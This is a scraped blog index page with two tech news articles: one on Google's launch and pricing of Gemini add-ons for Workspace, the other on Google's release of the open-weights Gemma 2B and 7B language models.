Google launches “Gemini Business” AI, adds $20 to the $6 Workspace bill

Google

Google went ahead with plans to launch Gemini for Workspace today. The big news is the pricing information, and you can see the Workspace pricing page is new, with every plan offering a “Gemini add-on.” Google’s old AI-for-Business plan, “Duet AI for Google Workspace,” is dead, though it never really launched anyway.

Google has a blog post explaining the changes. Google Workspace starts at $6 per user per month for the “Starter” package, and the AI “Add-on,” as Google is calling it, is an extra $20 monthly cost per user (all of these prices require an annual commitment). That is a massive price increase over the normal Workspace bill, but AI processing is expensive. Google says this business package will get you “Help me write in Docs and Gmail, Enhanced Smart Fill in Sheets and image generation in Slides.” It also includes the “1.0 Ultra” model for the Gemini chatbot—there’s a full feature list here. This $20 plan is subject to a usage limit for Gemini AI features of “1,000 times per month.”

The new Workspace pricing page, with a

Enlarge / The new Workspace pricing page, with a “Gemini Add-On” for every plan.

Google

Gemini for Google Workspace represents a total rebrand of the AI business product and some amount of consistency across Google’s hard-to-follow, constantly changing AI branding. Duet AI never really launched to the general public. The product, announced in August, only ever had a “Try” link that led to a survey, and after filling it out, Google would presumably contact some businesses and allow them to pay for Duet AI. Gemini Business now has a checkout page, and any Workspace business customer can buy the product today with just a few clicks.

Google’s second plan is “Gemini Enterprise,” which doesn’t come with any usage limits, but it’s also only available through a “contact us” link and not a normal checkout procedure. Enterprise is $30 per user per month, and it “includes additional capabilities for AI-powered meetings, where Gemini can translate closed captions in more than 100 language pairs, and soon even take meeting notes.”

Google launches “Gemini Business” AI, adds $20 to the $6 Workspace bill Read More »

google-goes-“open-ai”-with-gemma,-a-free,-open-weights-chatbot-family

Google goes “open AI” with Gemma, a free, open-weights chatbot family

Free hallucinations for all —

Gemma chatbots can run locally, and they reportedly outperform Meta’s Llama 2.

The Google Gemma logo

On Wednesday, Google announced a new family of AI language models called Gemma, which are free, open-weights models built on technology similar to the more powerful but closed Gemini models. Unlike Gemini, Gemma models can run locally on a desktop or laptop computer. It’s Google’s first significant open large language model (LLM) release since OpenAI’s ChatGPT started a frenzy for AI chatbots in 2022.

Gemma models come in two sizes: Gemma 2B (2 billion parameters) and Gemma 7B (7 billion parameters), each available in pre-trained and instruction-tuned variants. In AI, parameters are values in a neural network that determine AI model behavior, and weights are a subset of these parameters stored in a file.

Developed by Google DeepMind and other Google AI teams, Gemma pulls from techniques learned during the development of Gemini, which is the family name for Google’s most capable (public-facing) commercial LLMs, including the ones that power its Gemini AI assistant. Google says the name comes from the Latin gemma, which means “precious stone.”

While Gemma is Google’s first major open LLM since the launch of ChatGPT (it has released smaller research models such as FLAN-T5 in the past), it’s not Google’s first contribution to open AI research. The company cites the development of the Transformer architecture, as well as releases like TensorFlow, BERT, T5, and JAX as key contributions, and it would not be controversial to say that those have been important to the field.

A chart of Gemma performance provided by Google. Google says that Gemma outperforms Meta's Llama 2 on several benchmarks.

Enlarge / A chart of Gemma performance provided by Google. Google says that Gemma outperforms Meta’s Llama 2 on several benchmarks.

Owing to lesser capability and high confabulation rates, smaller open-weights LLMs have been more like tech demos until recently, as some larger ones have begun to match GPT-3.5 performance levels. Still, experts see source-available and open-weights AI models as essential steps in ensuring transparency and privacy in chatbots. Google Gemma is not “open source” however, since that term usually refers to a specific type of software license with few restrictions attached.

In reality, Gemma feels like a conspicuous play to match Meta, which has made a big deal out of releasing open-weights models (such as LLaMA and Llama 2) since February of last year. That technique stands in opposition to AI models like OpenAI’s GPT-4 Turbo, which is only available through the ChatGPT application and a cloud API and cannot be run locally. A Reuters report on Gemma focuses on the Meta angle and surmises that Google hopes to attract more developers to its Vertex AI cloud platform.

We have not used Gemma yet; however, Google claims the 7B model outperforms Meta’s Llama 2 7B and 13B models on several benchmarks for math, Python code generation, general knowledge, and commonsense reasoning tasks. It’s available today through Kaggle, a machine-learning community platform, and Hugging Face.

In other news, Google paired the Gemma release with a “Responsible Generative AI Toolkit,” which Google hopes will offer guidance and tools for developing what the company calls “safe and responsible” AI applications.

Google goes “open AI” with Gemma, a free, open-weights chatbot family Read More »